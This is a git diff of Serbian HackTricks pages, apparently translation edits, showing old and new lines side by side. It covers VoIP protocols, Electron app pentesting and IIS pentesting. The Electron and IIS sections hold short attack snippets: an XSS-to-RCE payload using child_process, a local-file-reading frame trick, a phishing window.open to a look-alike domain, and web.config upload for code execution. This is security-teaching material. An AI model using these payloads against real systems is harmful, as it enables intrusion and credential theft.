1. **Server kontrole poziva**: Ovaj server, obično Cisco Unified Communications Manager, upravlja procesima postavljanja poziva, modifikacije i završetka, kao i drugim telefonskim funkcijama poput prosleđivanja poziva, transfera poziva i zadržavanja poziva.
|
||||
2. **SCCP uređaji na kraju**: To su uređaji poput IP telefona, video konferencijskih jedinica ili drugih Cisco glasovnih i video uređaja koji koriste SCCP za komunikaciju sa serverom kontrole poziva. Oni se registruju kod servera, šalju i primaju signalne poruke i prate instrukcije koje pruža server kontrole poziva za upravljanje pozivima.
|
||||
3. **Gateway-i**: Ovi uređaji, poput glasovnih gateway-a ili medijskih gateway-a, odgovorni su za konvertovanje medijskih tokova između različitih mreža, poput tradicionalne prekidačke telefonske mreže i paketski prekidačkih IP mreža. Mogu obuhvatiti dodatne funkcionalnosti poput transkodiranja ili otklanjanja eha.
|
||||
3. **Gateway-i**: Ovi uređaji, poput glasovnih gateway-a ili medijskih gateway-a, odgovorni su za konvertovanje medijskih tokova između različitih mreža, poput tradicionalne prekidačke telefonske mreže i paketski prekidačkih IP mreža. Mogu takođe uključivati dodatne funkcionalnosti, poput transkodiranja ili otklanjanja eha.
|
||||
|
||||
SCCP nudi jednostavan i efikasan način komunikacije između Cisco servera kontrole poziva i uređaja na kraju. Međutim, vredi napomenuti da je **SCCP vlasnički protokol**, što može ograničiti interoperabilnost sa ne-Cisco sistemima. U takvim slučajevima, drugi standardni VoIP protokoli poput SIP-a mogu biti prikladniji.
|
||||
|
||||
|
@ -69,25 +69,25 @@ H.323 je **skup protokola** za multimedijalnu komunikaciju, uključujući glas,
|
|||
Neki ključni elementi H.323 skupa uključuju:
|
||||
|
||||
1. **Terminali**: To su uređaji na kraju, poput IP telefona, video konferencijskih sistema ili softverskih aplikacija, koji podržavaju H.323 i mogu učestvovati u multimedijalnim komunikacionim sesijama.
|
||||
2. **Gateway-i**: Ovi uređaji konvertuju medijske tokove između različitih mreža, poput tradicionalne prekidačke telefonske mreže i paketskih IP mreža, omogućavajući interoperabilnost između H.323 i drugih komunikacionih sistema. Mogu obuhvatiti dodatne funkcionalnosti poput transkodiranja ili otklanjanja eha.
|
||||
2. **Gateway-i**: Ovi uređaji konvertuju medijske tokove između različitih mreža, poput tradicionalne prekidačke telefonske mreže i paketskih IP mreža, omogućavajući interoperabilnost između H.323 i drugih komunikacionih sistema. Mogu takođe uključivati dodatne funkcionalnosti, poput transkodiranja ili otklanjanja eha.
|
||||
3. **Gatekeeper-i**: To su opcione komponente koje pružaju usluge kontrole poziva i upravljanja u H.323 mreži. Obavljaju funkcije poput prevođenja adresa, upravljanja propusnošću i kontrolu prijema, pomažući u upravljanju i optimizaciji resursa mreže.
|
||||
4. **Multipoint Control Units (MCU)**: Ovi uređaji olakšavaju višepartijske konferencije upravljajući i mešajući medijske tokove sa više uređaja na kraju. MCU-ovi omogućavaju funkcije poput kontrole rasporeda video zapisa, prebacivanja aktivirano glasom i kontinuirane prisutnosti, omogućavajući održavanje konferencija velikog obima sa više učesnika.
|
||||
|
||||
H.323 podržava niz audio i video kodeka, kao i druge dodatne usluge poput preusmeravanja poziva, transfera poziva, zadržavanja poziva i čekanja na poziv. Uprkos širokoj upotrebi u ranim danima VoIP-a, H.323 je postepeno zamenjen modernijim i fleksibilnijim protokolima poput **Session Initiation Protocol (SIP)**, koji nudi bolju interoperabilnost i lakšu implementaciju. Međutim, H.323 i dalje se koristi u mnogim zastarelim sistemima i podržava se od strane različitih proizvođača opreme.
|
||||
H.323 podržava niz audio i video kodeka, kao i druge dodatne usluge poput prosleđivanja poziva, transfera poziva, zadržavanja poziva i čekanja poziva. Iako je H.323 bio široko prihvaćen u ranim danima VoIP-a, postepeno je zamenjen modernijim i fleksibilnijim protokolima poput **Session Initiation Protocol (SIP)**, koji nudi bolju interoperabilnost i lakšu implementaciju. Međutim, H.323 i dalje se koristi u mnogim zastarelim sistemima i podržava ga različiti proizvođači opreme.
|
||||
|
||||
### IAX (Inter Asterisk eXchange)
|
||||
|
||||
IAX (Inter-Asterisk eXchange) je **signalni i kontrolni protokol poziva** koji se pretežno koristi za komunikaciju između Asterisk PBX (Private Branch Exchange) servera i drugih VoIP uređaja. Razvio ga je Mark Spencer, tvorac otvorenog PBX softvera Asterisk, kao alternativu drugim VoIP protokolima poput SIP-a i H.323.
|
||||
|
||||
IAX je poznat po svojoj **jednostavnosti, efikasnosti i lakoći implementacije**. Neki ključni elementi IAX-a uključuju:
|
||||
IAX je poznat po svojoj **jednostavnosti, efikasnosti i lakoći implementacije**. Neke ključne karakteristike IAX-a uključuju:
|
||||
|
||||
1. **Jedan UDP port**: IAX koristi jedan UDP port (4569) za signalizaciju i medijski saobraćaj, što pojednostavljuje prolazak kroz firewall i NAT, olakšavajući implementaciju u različitim mrežnim okruženjima.
|
||||
2. **Binarni protokol**: Za razliku od tekstualnih protokola poput SIP-a, IAX je binarni protokol, što smanjuje potrošnju propusnosti i čini ga efikasnijim za prenos signalnih i medijskih podataka.
|
||||
3. **Trunking**: IAX podržava trunking, što omogućava kombinovanje više poziva u jednu mrežnu vezu, smanjujući opterećenje i poboljšavajući iskorišćenje propusnosti.
|
||||
4. **Nativna enkripcija**: IAX ima ugrađenu podršku za enkripciju, koristeći metode poput RSA za razmenu ključeva i AES za enkripciju medija, pružajući sigurnu komunikaciju između krajnjih tačaka.
|
||||
5. **Komunikacija između vršnjaka**: IAX se može koristiti za direktnu komunikaciju između krajnjih tačaka bez potrebe za centralnim serverom, omogućavajući jednostavnije i efikasnije usmeravanje poziva.
|
||||
5. **Peer-to-Peer komunikacija**: IAX se može koristiti za direktnu komunikaciju između krajnjih tačaka bez potrebe za centralnim serverom, omogućavajući jednostavnije i efikasnije usmeravanje poziva.
|
||||
|
||||
Iako ima svoje prednosti, IAX ima neka ograničenja, poput primarnog fokusa na Asterisk ekosistem i manje široke upotrebe u poređenju sa etabliranim protokolima poput SIP-a. Kao rezultat toga, IAX možda nije najbolji izbor za interoperabilnost sa ne-Asterisk sistemima ili uređajima. Međutim, za one koji rade unutar Asterisk okruženja, IAX nudi robustno i efikasno rešenje za VoIP komunikaciju.
|
||||
Iako ima svoje prednosti, IAX ima neka ograničenja, poput primarnog fokusa na Asterisk ekosistem i manje rasprostranjene upotrebe u poređenju sa etabliranim protokolima poput SIP-a. Kao rezultat toga, IAX možda nije najbolji izbor za interoperabilnost sa ne-Asterisk sistemima ili uređajima. Međutim, za one koji rade unutar Asterisk okruženja, IAX nudi robustno i efikasno rešenje za VoIP komunikaciju.
|
||||
## Protokoli za prenos i transport
|
||||
|
||||
### SDP (Session Description Protocol)
|
||||
|
@ -98,7 +98,7 @@ Neke ključne elemente SDP-a uključuju:
|
|||
|
||||
1. **Informacije o sesiji**: SDP opisuje detalje multimedijalne sesije, uključujući naziv sesije, opis sesije, vreme početka i završetka.
|
||||
2. **Medijski tokovi**: SDP definiše karakteristike medijskih tokova, poput vrste medija (audio, video ili tekst), transportnog protokola (npr. RTP ili SRTP) i formata medija (npr. informacije o kodeku).
|
||||
3. **Informacije o vezi**: SDP pruža informacije o mrežnoj adresi (IP adresa) i broju porta na kojem bi medij trebalo da bude poslat ili primljen.
|
||||
3. **Informacije o konekciji**: SDP pruža informacije o mrežnoj adresi (IP adresa) i broju porta na kojem bi medij trebalo da bude poslat ili primljen.
|
||||
4. **Atributi**: SDP podržava korišćenje atributa radi pružanja dodatnih, opcionih informacija o sesiji ili medijskom toku. Atributi se mogu koristiti za specificiranje različitih funkcionalnosti poput ključeva za enkripciju, zahteva za propusnost ili mehanizama za kontrolu medija.
|
||||
|
||||
SDP se obično koristi u sledećem procesu:
|
||||
|
@ -114,7 +114,7 @@ Jednostavnost i fleksibilnost SDP-a čine ga široko prihvaćenim standardom za
|
|||
|
||||
1. **RTP (Real-time Transport Protocol)**: RTP je mrežni protokol dizajniran za dostavu audio i video podataka, ili drugih realnih medija, preko IP mreža. Razvijen od strane **IETF** i definisan u **RFC 3550**, RTP se često koristi sa signalizacijskim protokolima poput SIP-a i H.323 radi omogućavanja multimedijalne komunikacije. RTP pruža mehanizme za **sinhronizaciju**, **sekvenciranje** i **vremensko označavanje** medijskih tokova, pomažući u osiguravanju glatke i pravovremene reprodukcije medija.
|
||||
2. **RTCP (Real-time Transport Control Protocol)**: RTCP je prateći protokol za RTP, korišćen za praćenje kvaliteta usluge (QoS) i pružanje povratnih informacija o transmisiji medijskih tokova. Definisan u istom **RFC 3550** kao RTP, RTCP **periodično razmenjuje kontrolne pakete između učesnika u RTP sesiji**. Deli informacije poput gubitka paketa, džitera i vremena kašnjenja, što pomaže u dijagnostikovanju i prilagođavanju mrežnim uslovima, poboljšavajući ukupan kvalitet medija.
|
||||
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP je proširenje RTP-a koje pruža **enkripciju**, **autentikaciju poruka** i **zaštitu od reprodukcije** za medijske tokove, osiguravajući sigurnu transmisiju osetljivih audio i video podataka. Definisan u **RFC 3711**, SRTP koristi kriptografske algoritme poput AES za enkripciju i HMAC-SHA1 za autentikaciju poruka. SRTP se često koristi u kombinaciji sa sigurnim signalizacijskim protokolima poput SIP-a preko TLS-a radi pružanja sigurnosti od kraja do kraja u multimedijalnoj komunikaciji.
|
||||
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP je kriptografski protokol za dogovor o ključu koji pruža **enkripciju od kraja do kraja** za RTP medijske tokove. Razvijen od strane Phil Zimmermanna, tvorca PGP-a, ZRTP je opisan u **RFC 6189**. Za razliku od SRTP-a, koji se oslanja na signalizacijske protokole za razmenu ključeva, ZRTP je dizajniran da radi nezavisno od signalizacijskog protokola. Koristi **Diffie-Hellman razmenu ključeva** za uspostavljanje zajedničke tajne između komunicirajućih strana, bez potrebe za prethodnim poverenjem ili infrastrukturom javnih ključeva (PKI). ZRTP takođe uključuje funkcionalnosti poput **Short Authentication Strings (SAS)** radi zaštite od napada čoveka u sredini.
|
||||
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP je proširenje RTP-a koje pruža **enkripciju**, **autentikaciju poruka** i **zaštitu od reprodukcije** za medijske tokove, osiguravajući sigurnu transmisiju osetljivih audio i video podataka. Definisan u **RFC 3711**, SRTP koristi kriptografske algoritme poput AES za enkripciju i HMAC-SHA1 za autentikaciju poruka. SRTP se često koristi u kombinaciji sa sigurnim signalizacijskim protokolima poput SIP-a preko TLS-a radi obezbeđivanja sigurnosti od kraja do kraja u multimedijalnoj komunikaciji.
|
||||
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP je kriptografski protokol za dogovor o ključu koji pruža **enkripciju od kraja do kraja** za RTP medijske tokove. Razvijen od strane Phil Zimmermanna, tvorca PGP-a, ZRTP je opisan u **RFC 6189**. Za razliku od SRTP-a, koji se oslanja na signalizacijske protokole za razmenu ključeva, ZRTP je dizajniran da radi nezavisno od signalizacijskog protokola. Koristi **Diffie-Hellman razmenu ključeva** za uspostavljanje deljenog tajnog ključa između komunicirajućih strana, bez potrebe za prethodnim poverenjem ili infrastrukturom javnih ključeva (PKI). ZRTP takođe uključuje funkcionalnosti poput **Short Authentication Strings (SAS)** radi zaštite od napada čovek-u-sredini.
|
||||
|
||||
Ovi protokoli igraju ključne uloge u **dostavljanju i obezbeđivanju sigurne realne multimedijalne komunikacije preko IP mreža**. Dok RTP i RTCP upravljaju stvarnom transmisijom medija i praćenjem kvaliteta, SRTP i ZRTP osiguravaju da preneti medij bude zaštićen od prisluškivanja, manipulacije i napada reprodukcije.
|
||||
|
|
|
@ -14,15 +14,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu besplatno na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno**
|
|||
|
||||
## Uvod
|
||||
|
||||
Electron kombinuje lokalni backend (sa **NodeJS**) i frontend (**Chromium**), iako mu nedostaju neki mehanizmi bezbednosti modernih pretraživača.
|
||||
Electron kombinuje lokalni backend (sa **NodeJS**) i frontend (**Chromium**), iako mu nedostaju neki mehanizmi bezbednosti modernih pregledača.
|
||||
|
||||
Obično možete pronaći kod elektronske aplikacije unutar `.asar` aplikacije, kako biste dobili kod, morate ga izvući:
|
||||
```bash
|
||||
|
@ -50,7 +50,7 @@ Electron ima 2 tipa procesa:
|
|||
|
||||
![](<../../../.gitbook/assets/image (179).png>)
|
||||
|
||||
Proces renderer-a će biti prozor pregledača koji učitava datoteku:
|
||||
**Proces renderer-a** će biti prozor pregledača koji učitava datoteku:
|
||||
```javascript
|
||||
const {BrowserWindow} = require('electron');
|
||||
let win = new BrowserWindow();
|
||||
|
@ -66,10 +66,10 @@ Elektronska aplikacija **može pristupiti uređaju** putem Node API-ja iako se m
|
|||
* **`contextIsolation`** - je podrazumijevano uključen. Ako je isključen, glavni i renderer procesi nisu izolovani.
|
||||
* **`preload`** - podrazumijevano prazno.
|
||||
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - je podrazumijevano isključen. Ograničava akcije koje NodeJS može izvršiti.
|
||||
* Node Integracija u radnicima
|
||||
* Node Integracija u Radnicima
|
||||
* **`nodeIntegrationInSubframes`** - je podrazumijevano isključen.
|
||||
* Ako je **`nodeIntegration`** **omogućen**, to bi omogućilo korišćenje **Node.js API-ja** na web stranicama koje se **učitavaju u iframe-ovima** unutar Electron aplikacije.
|
||||
* Ako je **`nodeIntegration`** **onemogućen**, tada će se prethodno učitati u iframe-u.
|
||||
* Ako je **`nodeIntegration`** **onemogućen**, tada će se prelodi učitati u iframe-u
|
||||
|
||||
Primer konfiguracije:
|
||||
```javascript
|
||||
|
@ -125,7 +125,7 @@ Ako možete lokalno izvršiti Elektron aplikaciju, moguće je da možete naterat
|
|||
|
||||
## RCE: XSS + nodeIntegration
|
||||
|
||||
Ako je **nodeIntegration** postavljen na **on**, JavaScript veb stranice mogu lako koristiti Node.js funkcije jednostavno pozivajući `require()`. Na primer, način za izvršavanje aplikacije kalkulatora na Windows-u je:
|
||||
Ako je **nodeIntegration** podešen na **on**, JavaScript veb stranice mogu lako koristiti Node.js funkcije jednostavno pozivajući `require()`. Na primer, način za izvršavanje aplikacije kalkulatora na Windows-u je:
|
||||
```html
|
||||
<script>
|
||||
require('child_process').exec('calc');
|
||||
|
@ -174,7 +174,7 @@ runCalc();
|
|||
|
||||
## RCE: XSS + contextIsolation
|
||||
|
||||
_**contextIsolation**_ uvodi **odvojene kontekste između skripti veb stranica i unutrašnjeg koda JavaScript-a Elektron** tako da izvršavanje JavaScript-a svakog koda ne utiče jedan na drugi. Ovo je neophodna funkcija za eliminisanje mogućnosti RCE.
|
||||
_**contextIsolation**_ uvodi **odvojene kontekste između skripti veb stranica i unutrašnjeg koda JavaScript-a Elektron** tako da izvršavanje JavaScript koda svake skripte ne utiče jedna na drugu. Ovo je neophodna funkcija za eliminisanje mogućnosti RCE.
|
||||
|
||||
Ako konteksti nisu izolovani, napadač može:
|
||||
|
||||
|
@ -199,7 +199,7 @@ Postoje 2 mesta gde se ugrađene metode mogu prepisati: U preload kodu ili u unu
|
|||
|
||||
### Bypass click event
|
||||
|
||||
Ako su primenjena ograničenja prilikom klika na link, možda ćete moći da ih zaobiđete **praveći srednji klik** umesto redovnog levog klika
|
||||
Ako su primenjena ograničenja prilikom klika na link, možda ćete moći da ih zaobiđete **vršeći srednji klik** umesto redovnog levog klika
|
||||
```javascript
|
||||
window.addEventListener('click', (e) => {
|
||||
```
|
||||
|
@ -214,7 +214,7 @@ Prilikom interakcije korisnika sa linkovima ili otvaranjem novih prozora, specif
|
|||
webContents.on("new-window", function (event, url, disposition, options) {}
|
||||
webContents.on("will-navigate", function (event, url) {}
|
||||
```
|
||||
Ovi slušaoci **su preklopljeni od strane desktop aplikacije** kako bi implementirali svoju **poslovnu logiku**. Aplikacija procenjuje da li bi navigirani link trebalo da se otvori interno ili u eksternom web pregledaču. Ova odluka se obično donosi kroz funkciju, `openInternally`. Ako ova funkcija vrati `false`, to ukazuje da link treba da se otvori eksterno, koristeći funkciju `shell.openExternal`.
|
||||
Ovi slušaoci **su preklopljeni od strane desktop aplikacije** kako bi implementirali svoju **poslovnu logiku**. Aplikacija procenjuje da li bi navigirani link trebalo da se otvori interno ili u eksternom web pregledaču. Ova odluka se obično donosi kroz funkciju, `openInternally`. Ako ova funkcija vrati `false`, to ukazuje da bi link trebalo otvoriti eksterno, koristeći funkciju `shell.openExternal`.
|
||||
|
||||
**Evo pojednostavljenog pseudokoda:**
|
||||
|
||||
|
@ -255,21 +255,21 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
|
|||
```
|
||||
## **RCE: XSS + Stari Chromium**
|
||||
|
||||
Ako je **chromium** koji koristi aplikacija **zastareo** i postoje **poznate** **ranjivosti** na njemu, moguće je **iskoristiti ih i dobiti RCE putem XSS**.\
|
||||
Ako je **chromium** koji koristi aplikacija **zastareo** i postoje **poznate ranjivosti** na njemu, moguće je **iskoristiti ih i dobiti RCE putem XSS**.\
|
||||
Možete videti primer u ovom **izveštaju**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
|
||||
|
||||
## **XSS Ribarenje putem Internog URL regex zaobilaženja**
|
||||
|
||||
Pretpostavimo da ste pronašli XSS ali ne možete pokrenuti RCE ili ukrasti interne datoteke, možete pokušati da ga iskoristite za **ukradete pristupne podatke putem ribarenja**.
|
||||
Pretpostavimo da ste pronašli XSS ali **ne možete pokrenuti RCE ili ukrasti interne datoteke**, možete pokušati da ga iskoristite za **ukradete pristupne podatke putem ribarenja**.
|
||||
|
||||
Prvo treba da znate šta se dešava kada pokušate da otvorite novi URL, proveravajući JS kod u front-endu:
|
||||
Prvo treba da znate šta se dešava kada pokušate da otvorite novi URL, proveravajući JS kod na front-endu:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
|
||||
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
|
||||
```
|
||||
Poziv **`openInternally`** funkcije će odlučiti da li će se **link** otvoriti u **prozoru desktop aplikacije** kao link koji pripada platformi, **ili** će se otvoriti u **browseru kao resurs treće strane**.
|
||||
Poziv **`openInternally`** će odlučiti da li će se **link** otvoriti u **prozoru desktopa** kao link koji pripada platformi, **ili** će se otvoriti u **pregledaču kao resurs treće strane**.
|
||||
|
||||
U slučaju da je **regex** koji koristi funkcija **ranjiv na zaobilazak** (na primer, **ne beži tačke poddomena**), napadač bi mogao iskoristiti XSS da **otvori novi prozor koji** će se nalaziti na infrastrukturi napadača **tražeći od korisnika pristupne podatke**:
|
||||
U slučaju da je **regex** koji koristi funkcija **ranjiv za obilaske** (na primer, **ne bežeći tačke poddomena**), napadač bi mogao iskoristiti XSS da **otvori novi prozor koji** će se nalaziti na infrastrukturi napadača **tražeći od korisnika pristupne podatke**:
|
||||
```html
|
||||
<script>
|
||||
window.open("<http://subdomainagoogleq.com/index.html>")
|
||||
|
@ -277,7 +277,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
```
|
||||
## **Alati**
|
||||
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) je alat za identifikaciju loše konfiguracije i sigurnosnih anti-uzoraka u aplikacijama zasnovanim na Electron-u.
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) je alat za identifikaciju loše konfigurisanih segmenata i sigurnosnih anti-uzoraka u aplikacijama zasnovanim na Electron-u.
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) je otvoreni VS Code dodatak za Electron aplikacije koji koristi Electronegativity.
|
||||
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) za proveru ranjivih biblioteka trećih strana
|
||||
* [**Electro.ng**](https://electro.ng/): Morate ga kupiti
|
||||
|
@ -319,15 +319,15 @@ npm start
|
|||
* Više istraživanja i tekstova o sigurnosti Elektron aplikacija možete pronaći na [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokrenut na **dark web-u** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **stealer malvera**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji kradu informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -341,6 +341,6 @@ Drugi načini podrške HackTricks-u:
|
|||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -37,7 +37,7 @@ Testirajte ekstenzije izvršnih fajlova:
|
|||
|
||||
## Otkrivanje interne IP adrese
|
||||
|
||||
Na bilo kom IIS serveru gde dobijete 302, možete pokušati da uklonite zaglavlje Host i koristite HTTP/1.0, a unutar odgovora zaglavlje Lokacija bi moglo da vam pokaže internu IP adresu:
|
||||
Na bilo kom IIS serveru gde dobijete 302, možete pokušati da uklonite zaglavlje Host i koristite HTTP/1.0, a unutar odgovora zaglavlje Lokacija bi moglo da vas usmeri ka internoj IP adresi:
|
||||
```
|
||||
nc -v domain.com 80
|
||||
openssl s_client -connect domain.com:443
|
||||
|
@ -53,9 +53,9 @@ Location: https://192.168.5.237/owa/
|
|||
Server: Microsoft-IIS/10.0
|
||||
X-FEServer: NHEXCHANGE2016
|
||||
```
|
||||
## Izvršavanje .config fajlova
|
||||
## Izvršavanje .config datoteka
|
||||
|
||||
Možete otpremiti .config fajlove i koristiti ih za izvršavanje koda. Jedan način je dodavanje koda na kraj fajla unutar HTML komentara: [Preuzmite primer ovde](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
Možete otpremiti .config datoteke i koristiti ih za izvršavanje koda. Jedan način je dodavanje koda na kraj datoteke unutar HTML komentara: [Preuzmite primer ovde](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
|
||||
Više informacija i tehnike za iskorišćavanje ove ranjivosti [ovde](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
||||
|
||||
|
@ -74,25 +74,25 @@ Kreirana je spajanjem sadržaja sledećih lista:
|
|||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
||||
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
||||
|
||||
Koristite je bez dodavanja bilo kakvih ekstenzija, fajlovi koji je zahtevaju već je imaju.
|
||||
Koristite je bez dodavanja bilo kakvog nastavka, datoteke koje ga zahtevaju već ga imaju.
|
||||
|
||||
## Put Traversal
|
||||
## Traversiranje Putanje
|
||||
|
||||
### Otkrivanje izvornog koda
|
||||
|
||||
Proverite kompletan opis u: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
|
||||
{% hint style="info" %}
|
||||
Kao sažetak, postoji nekoliko web.config fajlova unutar foldera aplikacije sa referencama na "**assemblyIdentity**" fajlove i "**namespaces**". Sa ovim informacijama je moguće znati **gde se nalaze izvršni fajlovi** i preuzeti ih.\
|
||||
Iz **preuzetih Dll fajlova** takođe je moguće pronaći **nove namespaces** gde biste trebali pokušati pristupiti i dobiti web.config fajl kako biste pronašli nove namespaces i assemblyIdentity.\
|
||||
Takođe, fajlovi **connectionstrings.config** i **global.asax** mogu sadržati zanimljive informacije.\\
|
||||
